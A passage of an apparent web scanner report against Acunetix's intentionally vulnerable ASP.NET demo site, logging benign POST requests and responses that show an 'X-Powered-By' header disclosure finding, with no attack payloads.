title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Content-Length: 1373 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,373 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=&btnSend=Send+comment
Response Header - size: 178 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT
Response Body - size: 0 bytes.
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=2
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Content-Length: 1681 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,681 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKpxZClDQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKShEjjcO8QZ%2BTqRo3QvanE8jv9G&tbComment=&btnSend=Send+comment
Response Header - size: 178 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT
Response Body - size: 0 bytes.
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=3
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Content-Length: 1501 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,501 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg%2FaWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP%2FMHHnstJY%2FfWtD4cYSdoYkheQ%3D%3D&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQLj8dP9DwKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBI1RRJ3EGUKdWdAQOQ9gMGQKbUn7&tbComment=&btnSend=Send+comment
Response Header - size: 178 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT
Response Body - size: 0 bytes.
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 395 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 987 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 987 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d%2Byr9JWRLj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 12523
Response Body - size: 12,523 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 